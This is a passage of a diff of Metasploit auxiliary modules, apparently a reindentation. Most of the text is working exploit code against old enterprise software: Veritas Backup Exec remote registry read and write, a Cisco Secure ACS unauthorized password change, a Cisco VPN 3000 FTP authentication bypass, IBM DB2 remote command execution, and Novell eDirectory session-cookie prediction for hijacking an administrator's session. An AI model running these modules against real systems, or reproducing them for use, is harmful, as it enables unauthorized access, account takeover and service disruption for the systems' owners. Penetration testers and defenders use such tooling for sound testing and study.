- return stub
- end
-
- # RPC Service 5
- def backupexec_regrpc_write(opts = {})
- subkey = opts[:subkey] || ''
- subval = opts[:subval] || ''
- hive = opts[:hive] || HKEY_LOCAL_MACHINE
- type = opts[:type] || REG_SZ
- data = opts[:data] || ''
-
- if (type == REG_SZ || type == REG_EXPAND_SZ)
- data = Rex::Text.to_unicode(data+"\x00")
- end
-
- stub =
- NDR.UnicodeConformantVaryingString(subkey) +
- NDR.UnicodeConformantVaryingString(subval) +
- NDR.long(type) +
- NDR.long(data.length) +
- NDR.long(data.length) +
- data +
- NDR.align(data) +
- NDR.long(4) +
- NDR.long(4) +
- NDR.long(hive)
- return stub
- end
+ include Msf::Exploit::Remote::DCERPC
+ include ::Rex::Platforms::Windows
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Veritas Backup Exec Server Registry Access',
+ 'Description' => %q{
+ This modules exploits a remote registry access flaw in the BackupExec Windows
+ Server RPC service. This vulnerability was discovered by Pedram Amini and is based
+ on the NDR stub information information posted to openrce.org.
+ Please see the action list for the different attack modes.
+
+ },
+ 'Author' => [ 'hdm' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'OSVDB', '17627' ],
+ [ 'CVE', '2005-0771' ],
+ [ 'URL', 'http://www.idefense.com/application/poi/display?id=269&type=vulnerabilities'],
+ ],
+ 'Actions' =>
+ [
+ ['System Information'],
+ ['Create Logon Notice']
+ ],
+ 'DefaultAction' => 'System Information'
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(6106),
+ OptString.new('WARN',
+ [
+ false,
+ "The warning to display for the Logon Notice action",
+ "Compromised by Metasploit!\r\n"
+ ]
+ ),
+ ], self.class)
+ end
+
+ def auxiliary_commands
+ return {
+ "regread" => "Read a registry value",
+ # "regenum" => "Enumerate registry keys",
+ }
+ end
+
+ def run
+ case action.name
+ when 'System Information'
+ system_info()
+ when 'Create Logon Notice'
+ logon_notice()
+ end
+ end
+
+
+ def cmd_regread(*args)
+
+ if (args.length == 0)
+ print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")
+ return
+ end
+
+ paths = args[0].split("\\")
+ hive = paths.shift
+ subval = paths.pop
+ subkey = paths.join("\\")
+ data = backupexec_regread(hive, subkey, subval)
+
+ if (data)
+ print_status("DATA: #{deunicode(data)}")
+ else
+ print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...")
+ end
+
+ end
+
+ def cmd_regenum(*args)
+
+ if (args.length == 0)
+ print_status("Usage: regenum HKLM\\\\Software")
+ return
+ end
+
+ paths = args[0].split("\\")
+ hive = paths.shift
+ subkey = "\\" + paths.join("\\")
+ data = backupexec_regenum(hive, subkey)
+
+ if (data)
+ print_status("DATA: #{deunicode(data)}")
+ else
+ print_error("Failed to enumerate #{hive}\\#{subkey}...")
+ end
+
+ end
+
+ def system_info
+ print_status("Dumping system information...")
+
+ prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
+ prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'
+ prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'
+ owner = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOwner') || 'Unknown Owner'
+ company = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOrganization') || 'Unknown Company'
+ cpu = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU'
+ username = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM'
+
+ print_status("The current interactive user is #{deunicode(username)}")
+ print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})")
+ print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
+ print_status("The system runs on a #{deunicode(cpu)}")
+ end
+
+ def logon_notice
+ print_status("Setting the logon warning to #{datastore['WARN'].strip}...")
+ backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN'])
+ backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')
+ end
+
+
+ def deunicode(str)
+ str.gsub(/\x00/, '').strip
+ end
+
+ #
+ # Write a registry key
+ #
+ def backupexec_regwrite(hive, subkey, subval, type, data)
+ stub = backupexec_regrpc_write(
+ :hive => registry_hive_lookup(hive),
+ :subkey => subkey,
+ :subval => subval,
+ :type => type,
+ :data => data
+ )
+ resp = backupexec_regrpc_call(5, stub)
+ return false if resp.length == 0
+ return true
+ end
+
+ #
+ # Read a registry key
+ #
+ def backupexec_regread(hive, subkey, subval, type = REG_SZ)
+ stub = backupexec_regrpc_read(
+ :hive => registry_hive_lookup(hive),
+ :subkey => subkey,
+ :subval => subval,
+ :type => type
+ )
+ resp = backupexec_regrpc_call(4, stub)
+
+ return nil if resp.length == 0
+ ret, len = resp[0,8].unpack('VV')
+ return nil if ret == 0
+ return nil if len == 0
+ return resp[8, len]
+ end
+
+ #
+ # Enumerate a registry key
+ #
+ def backupexec_regenum(hive, subkey)
+ stub = backupexec_regrpc_enum(
+ :hive => registry_hive_lookup(hive),
+ :subkey => subkey
+ )
+ resp = backupexec_regrpc_call(7, stub)
+ p resp
+
+ return nil if resp.length == 0
+ ret, len = resp[0,8].unpack('VV')
+ return nil if ret == 0
+ return nil if len == 0
+ return resp[8, len]
+ end
+
+ #
+ # Call the backupexec registry service
+ #
+ def backupexec_regrpc_call(opnum, data = '')
+
+ handle = dcerpc_handle(
+ '93841fd0-16ce-11ce-850d-02608c44967b', '1.0',
+ 'ncacn_ip_tcp', [datastore['RPORT']]
+ )
+
+ dcerpc_bind(handle)
+
+ resp = dcerpc.call(opnum, data)
+ outp = ''
+
+ if (dcerpc.last_response and dcerpc.last_response.stub_data)
+ outp = dcerpc.last_response.stub_data
+ end
+
+ disconnect
+
+ outp
+ end
+
+ # RPC Service 4
+ def backupexec_regrpc_read(opts = {})
+ subkey = opts[:subkey] || ''
+ subval = opts[:subval] || ''
+ hive = opts[:hive] || HKEY_LOCAL_MACHINE
+ type = opts[:type] || REG_SZ
+
+ stub =
+ NDR.UnicodeConformantVaryingString(subkey) +
+ NDR.UnicodeConformantVaryingString(subval) +
+ NDR.long(type) +
+ NDR.long(1024) +
+ NDR.long(0) +
+ NDR.long(4) +
+ NDR.long(4) +
+ NDR.long(hive)
+ return stub
+ end
+
+ # RPC Service 7
+ def backupexec_regrpc_enum(opts = {})
+ subkey = opts[:subkey] || ''
+ hive = opts[:hive] || HKEY_LOCAL_MACHINE
+ stub =
+ NDR.UnicodeConformantVaryingString(subkey) +
+ NDR.long(4096) +
+ NDR.long(0) +
+ NDR.long(4) +
+ NDR.long(4) +
+ NDR.long(hive)
+ return stub
+ end
+
+ # RPC Service 5
+ def backupexec_regrpc_write(opts = {})
+ subkey = opts[:subkey] || ''
+ subval = opts[:subval] || ''
+ hive = opts[:hive] || HKEY_LOCAL_MACHINE
+ type = opts[:type] || REG_SZ
+ data = opts[:data] || ''
+
+ if (type == REG_SZ || type == REG_EXPAND_SZ)
+ data = Rex::Text.to_unicode(data+"\x00")
+ end
+
+ stub =
+ NDR.UnicodeConformantVaryingString(subkey) +
+ NDR.UnicodeConformantVaryingString(subval) +
+ NDR.long(type) +
+ NDR.long(data.length) +
+ NDR.long(data.length) +
+ data +
+ NDR.align(data) +
+ NDR.long(4) +
+ NDR.long(4) +
+ NDR.long(hive)
+ return stub
+ end
end
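--- a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
+++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
@@ -9,108 +9,108 @@
 class Metasploit4 < Msf::Auxiliary
- include Msf::Exploit::Remote::HttpClient
- include Msf::Auxiliary::Report
- include Msf::Auxiliary::Scanner
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change',
- 'Description' => %q{
- This module exploits an authentication bypass issue which allows arbitrary
- password change requests to be issued for any user in the local store.
- Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well
- as version 5.2 with either no patches or patches 1 and 2 are vulnerable.
- },
- 'References' =>
- [
- ['BID', '47093'],
- ['CVE', '2011-0951'],
- ['URL', 'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html']
- ],
- 'Author' =>
- [
- 'Jason Kratzer <pyoor[at]flinkd.org>'
- ],
- 'License' => MSF_LICENSE
- ))
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change',
+ 'Description' => %q{
+ This module exploits an authentication bypass issue which allows arbitrary
+ password change requests to be issued for any user in the local store.
+ Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well
+ as version 5.2 with either no patches or patches 1 and 2 are vulnerable.
+ },
+ 'References' =>
+ [
+ ['BID', '47093'],
+ ['CVE', '2011-0951'],
+ ['URL', 'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html']
+ ],
+ 'Author' =>
+ [
+ 'Jason Kratzer <pyoor[at]flinkd.org>'
+ ],
+ 'License' => MSF_LICENSE
+ ))
- register_options(
- [
- Opt::RPORT(443),
- OptString.new('TARGETURI', [true, 'Path to UCP WebService', '/PI/services/UCP/']),
- OptString.new('USERNAME', [true, 'Username to use', '']),
- OptString.new('PASSWORD', [true, 'Password to use', '']),
- OptBool.new('SSL', [true, 'Use SSL', true])
- ], self.class)
- end
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptString.new('TARGETURI', [true, 'Path to UCP WebService', '/PI/services/UCP/']),
+ OptString.new('USERNAME', [true, 'Username to use', '']),
+ OptString.new('PASSWORD', [true, 'Password to use', '']),
+ OptBool.new('SSL', [true, 'Use SSL', true])
+ ], self.class)
+ end
- def rport
- datastore['RPORT']
- end
+ def rport
+ datastore['RPORT']
+ end
- def run_host(ip)
- soapenv='http://schemas.xmlsoap.org/soap/envelope/'
- soapenvenc='http://schemas.xmlsoap.org/soap/encoding/'
- xsi='http://www.w3.org/1999/XMLSchema-instance'
- xsd='http://www.w3.org/1999/XMLSchema'
- ns1='ns1:changeUserPass'
+ def run_host(ip)
+ soapenv='http://schemas.xmlsoap.org/soap/envelope/'
+ soapenvenc='http://schemas.xmlsoap.org/soap/encoding/'
+ xsi='http://www.w3.org/1999/XMLSchema-instance'
+ xsd='http://www.w3.org/1999/XMLSchema'
+ ns1='ns1:changeUserPass'
- data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
- data << '<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="' + soapenvenc + '" '
- data << 'xmlns:SOAP-ENC="' + soapenvenc + '" '
- data << 'xmlns:xsi="' + xsi + '" xmlns:SOAP-ENV="' + soapenv + '" '
- data << 'xmlns:xsd="' + xsd + '">' + "\r\n"
+ data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
+ data << '<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="' + soapenvenc + '" '
+ data << 'xmlns:SOAP-ENC="' + soapenvenc + '" '
+ data << 'xmlns:xsi="' + xsi + '" xmlns:SOAP-ENV="' + soapenv + '" '
+ data << 'xmlns:xsd="' + xsd + '">' + "\r\n"
- data << '<SOAP-ENV:Body>' + "\r\n"
- data << '<ns1:changeUserPass xmlns:ns1="UCP" SOAP-ENC:root="1">' + "\r\n"
- data << '<v1 xsi:type="xsd:string">' + datastore['USERNAME'] + '</v1>' + "\r\n"
- data << '<v2 xsi:type="xsd:string">fakepassword</v2>' + "\r\n"
- data << '<v3 xsi:type="xsd:string">' + datastore['PASSWORD'] + '</v3>' + "\r\n"
- data << '</ns1:changeUserPass>'
- data << '</SOAP-ENV:Body>' + "\r\n"
- data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
+ data << '<SOAP-ENV:Body>' + "\r\n"
+ data << '<ns1:changeUserPass xmlns:ns1="UCP" SOAP-ENC:root="1">' + "\r\n"
+ data << '<v1 xsi:type="xsd:string">' + datastore['USERNAME'] + '</v1>' + "\r\n"
+ data << '<v2 xsi:type="xsd:string">fakepassword</v2>' + "\r\n"
+ data << '<v3 xsi:type="xsd:string">' + datastore['PASSWORD'] + '</v3>' + "\r\n"
+ data << '</ns1:changeUserPass>'
+ data << '</SOAP-ENV:Body>' + "\r\n"
+ data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
- print_status("Issuing password change request for: " + datastore['USERNAME'])
+ print_status("Issuing password change request for: " + datastore['USERNAME'])
- begin
- uri = normalize_uri(target_uri.path)
- uri << '/' if uri[-1,1] != '/'
- res = send_request_cgi({
- 'uri' => uri,
- 'method' => 'POST',
- 'data' => data,
- 'headers' =>
- {
- 'SOAPAction' => '"changeUserPass"',
- }
- }, 60)
+ begin
+ uri = normalize_uri(target_uri.path)
+ uri << '/' if uri[-1,1] != '/'
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>
+ {
+ 'SOAPAction' => '"changeUserPass"',
+ }
+ }, 60)
- rescue ::Rex::ConnectionError
- print_error("#{rhost}:#{rport} [ACS] Unable to communicate")
- return :abort
- end
+ rescue ::Rex::ConnectionError
+ print_error("#{rhost}:#{rport} [ACS] Unable to communicate")
+ return :abort
+ end
- if not res
- print_error("#{rhost}:#{rport} [ACS] Unable to connect")
- return
- elsif res.code == 200
- body = res.body
- if body.match(/success/i)
- print_good("#{rhost} - Success! Password has been changed.")
- elsif body.match(/Password has already been used/)
- print_error("#{rhost} - Failed! The supplied password has already been used.")
- print_error("Please change the password and try again.")
- elsif body.match(/Invalid credntials for user/)
- print_error("#{rhost} - Failed! Either the username does not exist or target is not vulnerable.")
- print_error("Please change the username and try again.")
- else
- print_error("#{rhost} - Failed! An unknown error has occurred.")
- end
- else
- print_error("#{rhost} - Failed! The webserver issued a #{res.code} response.")
- print_error("Please validate the TARGETURI option and try again.")
- end
+ if not res
+ print_error("#{rhost}:#{rport} [ACS] Unable to connect")
+ return
+ elsif res.code == 200
+ body = res.body
+ if body.match(/success/i)
+ print_good("#{rhost} - Success! Password has been changed.")
+ elsif body.match(/Password has already been used/)
+ print_error("#{rhost} - Failed! The supplied password has already been used.")
+ print_error("Please change the password and try again.")
+ elsif body.match(/Invalid credntials for user/)
+ print_error("#{rhost} - Failed! Either the username does not exist or target is not vulnerable.")
+ print_error("Please change the username and try again.")
+ else
+ print_error("#{rhost} - Failed! An unknown error has occurred.")
+ end
+ else
+ print_error("#{rhost} - Failed! The webserver issued a #{res.code} response.")
+ print_error("Please validate the TARGETURI option and try again.")
+ end
- end
+ end
 end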
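--- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb
+++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb
@@ -11,70 +11,70 @@
 class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Tcp
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access',
- 'Description' => %q{
- This module tests for a logic vulnerability in the Cisco VPN Concentrator
- 3000 series. It is possible to execute some FTP statements without authentication
- (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs
- when working with CWD commands. This module simply creates an arbitrary directory,
- verifies that the directory has been created, then deletes it and verifies deletion
- to confirm the bug.
- },
- 'Author' => [ 'patrick' ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- [ 'BID', '19680' ],
- [ 'CVE', '2006-4313' ],
- [ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20060823-vpn3k.shtml' ],
- [ 'OSVDB', '28139' ],
- [ 'OSVDB', '28138' ],
- ],
- 'DisclosureDate' => 'Aug 23 2006'))
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access',
+ 'Description' => %q{
+ This module tests for a logic vulnerability in the Cisco VPN Concentrator
+ 3000 series. It is possible to execute some FTP statements without authentication
+ (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs
+ when working with CWD commands. This module simply creates an arbitrary directory,
+ verifies that the directory has been created, then deletes it and verifies deletion
+ to confirm the bug.
+ },
+ 'Author' => [ 'patrick' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'BID', '19680' ],
+ [ 'CVE', '2006-4313' ],
+ [ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20060823-vpn3k.shtml' ],
+ [ 'OSVDB', '28139' ],
+ [ 'OSVDB', '28138' ],
+ ],
+ 'DisclosureDate' => 'Aug 23 2006'))
- register_options(
- [
- Opt::RPORT(21),
- ], self.class)
- end
+ register_options(
+ [
+ Opt::RPORT(21),
+ ], self.class)
+ end
- def run
- connect
- res = sock.get_once
- if (res and res =~ /220 Session will be terminated after/)
- print_status("Target appears to be a Cisco VPN Concentrator 3000 series.")
+ def run
+ connect
+ res = sock.get_once
+ if (res and res =~ /220 Session will be terminated after/)
+ print_status("Target appears to be a Cisco VPN Concentrator 3000 series.")
- test = Rex::Text.rand_text_alphanumeric(8)
+ test = Rex::Text.rand_text_alphanumeric(8)
- print_status("Attempting to create directory: MKD #{test}")
- sock.put("MKD #{test}\r\n")
- res = sock.get(-1,5)
+ print_status("Attempting to create directory: MKD #{test}")
+ sock.put("MKD #{test}\r\n")
+ res = sock.get(-1,5)
- if (res =~/257 MKD command successful\./)
- print_status("\tDirectory #{test} reportedly created. Verifying with SIZE #{test}")
- sock.put("SIZE #{test}\r\n")
- res = sock.get(-1,5)
- if (res =~ /550 Not a regular file/)
- print_status("\tServer reports \"not a regular file\". Directory verified.")
- print_status("\tAttempting to delete directory: RMD #{test}")
- sock.put("RMD #{test}\r\n")
- res = sock.get(-1,5)
- if (res =~ /250 RMD command successful\./)
- print_status("\tDirectory #{test} reportedly deleted. Verifying with SIZE #{test}")
- sock.put("SIZE #{test}\r\n")
- res = sock.get(-1,5)
- print_status("\tDirectory #{test} no longer exists!")
- print_status("Target is confirmed as vulnerable!")
- end
- end
- end
- else
- print_status("Target is either not Cisco or the target has been patched.")
- end
- disconnect
- end
+ if (res =~/257 MKD command successful\./)
+ print_status("\tDirectory #{test} reportedly created. Verifying with SIZE #{test}")
+ sock.put("SIZE #{test}\r\n")
+ res = sock.get(-1,5)
+ if (res =~ /550 Not a regular file/)
+ print_status("\tServer reports \"not a regular file\". Directory verified.")
+ print_status("\tAttempting to delete directory: RMD #{test}")
+ sock.put("RMD #{test}\r\n")
+ res = sock.get(-1,5)
+ if (res =~ /250 RMD command successful\./)
+ print_status("\tDirectory #{test} reportedly deleted. Verifying with SIZE #{test}")
+ sock.put("SIZE #{test}\r\n")
+ res = sock.get(-1,5)
+ print_status("\tDirectory #{test} no longer exists!")
+ print_status("Target is confirmed as vulnerable!")
+ end
+ end
+ end
+ else
+ print_status("Target is either not Cisco or the target has been patched.")
+ end
+ disconnect
+ end
 end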
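--- a/modules/auxiliary/admin/db2/db2rcmd.rb
+++ b/modules/auxiliary/admin/db2/db2rcmd.rb
@@ -9,84 +9,84 @@
 class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::SMB
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability',
- 'Description' => %q{
- This module exploits a vulnerability in the Remote Command Server
- component in IBM's DB2 Universal Database 8.1. An authenticated
- attacker can send arbitrary commands to the DB2REMOTECMD named pipe
- which could lead to administrator privileges.
- },
- 'Author' => [ 'MC' ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- [ 'CVE', '2004-0795' ],
- [ 'OSVDB', '4180' ],
- [ 'BID', '9821' ],
- ],
- 'DisclosureDate' => 'Mar 4 2004'))
-
- register_options(
- [
- OptString.new('CMD', [ true, 'The command to execute', 'ver']),
- OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']),
- OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'])
- ], self.class )
- end
-
- def run
-
- print_status("Connecting to the server...")
- connect()
-
- print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
-
- # Connect with a valid user/pass. if not, then bail.
- begin
- smb_login()
- rescue ::Exception => e
- print_error("Error: #{e}")
- disconnect
- return
- end
-
- # Have it so our command arg is convenient to call.
- rcmd = datastore['CMD']
-
- print_status("Connecting to named pipe \\DB2REMOTECMD...")
-
- # If the pipe doesn't exist, bail.
- begin
- pipe = simple.create_pipe('\\DB2REMOTECMD')
- rescue ::Exception => e
- print_error("Error: #{e}")
- disconnect
- return
- end
-
- # If we get this far, do the dance.
-
- fid = pipe.file_id
-
- # Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
- trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
-
- # Write to the pipe, our command length comes into play.
- pipe.write([0x00000001].pack('V') + "DB2" + "\x00" * 525 + [rcmd.length].pack('V'))
- # Send off our command
- pipe.write(rcmd)
-
- # Read from the pipe and give us the data.
- res = pipe.read()
- print_line(res)
-
- # Close the named pipe and disconnect from the socket.
- pipe.close
- disconnect
-
- end
+ include Msf::Exploit::Remote::SMB
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability',
+ 'Description' => %q{
+ This module exploits a vulnerability in the Remote Command Server
+ component in IBM's DB2 Universal Database 8.1. An authenticated
+ attacker can send arbitrary commands to the DB2REMOTECMD named pipe
+ which could lead to administrator privileges.
+ },
+ 'Author' => [ 'MC' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2004-0795' ],
+ [ 'OSVDB', '4180' ],
+ [ 'BID', '9821' ],
+ ],
+ 'DisclosureDate' => 'Mar 4 2004'))
+
+ register_options(
+ [
+ OptString.new('CMD', [ true, 'The command to execute', 'ver']),
+ OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']),
+ OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'])
+ ], self.class )
+ end
+
+ def run
+
+ print_status("Connecting to the server...")
+ connect()
+
+ print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
+
+ # Connect with a valid user/pass. if not, then bail.
+ begin
+ smb_login()
+ rescue ::Exception => e
+ print_error("Error: #{e}")
+ disconnect
+ return
+ end
+
+ # Have it so our command arg is convenient to call.
+ rcmd = datastore['CMD']
+
+ print_status("Connecting to named pipe \\DB2REMOTECMD...")
+
+ # If the pipe doesn't exist, bail.
+ begin
+ pipe = simple.create_pipe('\\DB2REMOTECMD')
+ rescue ::Exception => e
+ print_error("Error: #{e}")
+ disconnect
+ return
+ end
+
+ # If we get this far, do the dance.
+
+ fid = pipe.file_id
+
+ # Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
+ trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
+
+ # Write to the pipe, our command length comes into play.
+ pipe.write([0x00000001].pack('V') + "DB2" + "\x00" * 525 + [rcmd.length].pack('V'))
+ # Send off our command
+ pipe.write(rcmd)
+
+ # Read from the pipe and give us the data.
+ res = pipe.read()
+ print_line(res)
+
+ # Close the named pipe and disconnect from the socket.
+ pipe.close
+ disconnect
+
+ end
 end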
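--- a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb
+++ b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb
@@ -11,74 +11,74 @@
 class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Tcp
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Novell eDirectory DHOST Predictable Session Cookie',
- 'Description' => %q{
- This module is able to predict the next session cookie value issued
- by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run
- this module, wait until the real administrator logs in, then specify the
- predicted cookie value to hijack their session.
- },
- 'References' =>
- [
- ['OSVDB', '60035'],
- ],
- 'Author' => 'hdm',
- 'License' => MSF_LICENSE
- ))
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Novell eDirectory DHOST Predictable Session Cookie',
+ 'Description' => %q{
+ This module is able to predict the next session cookie value issued
+ by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run
+ this module, wait until the real administrator logs in, then specify the
+ predicted cookie value to hijack their session.
+ },
+ 'References' =>
+ [
+ ['OSVDB', '60035'],
+ ],
+ 'Author' => 'hdm',
+ 'License' => MSF_LICENSE
+ ))
- register_options([
- Opt::RPORT(8030),
- OptBool.new('SSL', [true, 'Use SSL', true])
- ], self.class)
- end
+ register_options([
+ Opt::RPORT(8030),
+ OptBool.new('SSL', [true, 'Use SSL', true])
+ ], self.class)
+ end
- def run
- vals = []
- name = ""
+ def run
+ vals = []
+ name = ""
- print_status("Making 5 requests to verify predictions...")
- 1.upto(6) do
+ print_status("Making 5 requests to verify predictions...")
+ 1.upto(6) do
- connect
- req = "GET /dhost/ HTTP/1.1\r\n"
- req << "Host: #{rhost}:#{rport}\r\n"
- req << "Connection: close\r\n\r\n"
- sock.put(req)
- res = sock.get_once(-1,5)
- disconnect
+ connect
+ req = "GET /dhost/ HTTP/1.1\r\n"
+ req << "Host: #{rhost}:#{rport}\r\n"
+ req << "Connection: close\r\n\r\n"
+ sock.put(req)
+ res = sock.get_once(-1,5)
+ disconnect
- cookie = nil
- if(res and res =~ /Cookie:\s*([^\s]+)\s*/mi)
- cookie = $1
- cookie,junk = cookie.split(';')
- name,cookie = cookie.split('=')
- cookie = cookie.to_i(16)
- vals << cookie
- end
- end
+ cookie = nil
+ if(res and res =~ /Cookie:\s*([^\s]+)\s*/mi)
+ cookie = $1
+ cookie,junk = cookie.split(';')
+ name,cookie = cookie.split('=')
+ cookie = cookie.to_i(16)
+ vals << cookie
+ end
+ end
- deltas = []
- prev_val = nil
- vals.each_index do |i|
- if(i > 0)
- delta = vals[i] - prev_val
- print_status("Cookie: #{i} #{"%.8x" % vals[i]} DELTA #{"%.8x" % delta}")
- deltas << delta
- end
- prev_val = vals[i]
- end
+ deltas = []
+ prev_val = nil
+ vals.each_index do |i|
+ if(i > 0)
+ delta = vals[i] - prev_val
+ print_status("Cookie: #{i} #{"%.8x" % vals[i]} DELTA #{"%.8x" % delta}")
+ deltas << delta
+ end
+ prev_val = vals[i]
+ end
- deltas.uniq!
- if(deltas.length < 4)
- print_status("The next cookie value will be: #{name}=#{"%.8x" % (prev_val + deltas[0])}")
- else
- print_status("The cookie value is less predictable, maybe this has been patched?")
- print_status("Deltas: #{deltas.map{|x| "%.8x" % x}.join(", ")}")
- end
- end
+ deltas.uniq!
+ if(deltas.length < 4)
+ print_status("The next cookie value will be: #{name}=#{"%.8x" % (prev_val + deltas[0])}")
+ else
+ print_status("The cookie value is less predictable, maybe this has been patched?")
+ print_status("Deltas: #{deltas.map{|x| "%.8x" % x}.join(", ")}")
+ end
+ end
 end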
278 modules/auxiliary/admin/edirectory/edirectory_edirutil.rb
@@ -9,153 +9,153 @@
class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::Tcp
- include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Novell eDirectory eMBox Unauthenticated File Access',
- 'Description' => %q{
- This module will access Novell eDirectory's eMBox service and can run the
- following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,
- STOP_SERVICE, START_SERVICE, SET_LOGFILE.
- },
- 'References' =>
- [
- [ 'CVE', '2008-0926' ],
- [ 'BID', '28441' ],
- [ 'OSVDB', '43690' ]
- ],
- 'Author' =>
- [
- 'Nicob',
- 'MC', #Initial Metasploit module
- 'sinn3r'
- ],
- 'License' => MSF_LICENSE,
- 'Actions' =>
- [
- [
- 'GET_DN',
- {
- 'Description' => 'Get DN',
- 'CMD' => 'novell.embox.connmgr.serverinfo',
- 'PATTERN' => /<ServerDN dt="Binary">(.*)<\/ServerDN>/,
- 'USE_PARAM' => false
- }
- ],
- [
- 'READ_LOGS',
- {
- 'Description' => 'Read all the log files',
- 'CMD' => 'logger.readlog',
- 'PATTERN' => /<LogFileData>(.*)<\/LogFileData>/,
- 'USE_PARAM' => false
- }
- ],
- [
- 'LIST_SERVICES',
- {
- 'Description' => 'List services',
- 'CMD' => 'novell.embox.service.getServiceList',
- 'PATTERN' => /<DSService:Message dt=\"Binary\">(.*)<\/DSService:Message>/,
- 'USE_PARAM' => false
- }
- ],
- [
- 'STOP_SERVICE',
- {
- 'Description' => 'Stop a service',
- 'CMD' => 'novell.embox.service.stopService',
- 'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
- 'PARAM' => '<Parameters><params xmlns:DSService="service.dtd">'+
- '<DSService:moduleName>__PARAM__</DSService:moduleName>'+
- '</params></Parameters>',
- 'USE_PARAM' => true
- }
- ],
- [
- 'START_SERVICE',
- {
- 'Description' => 'Start a service',
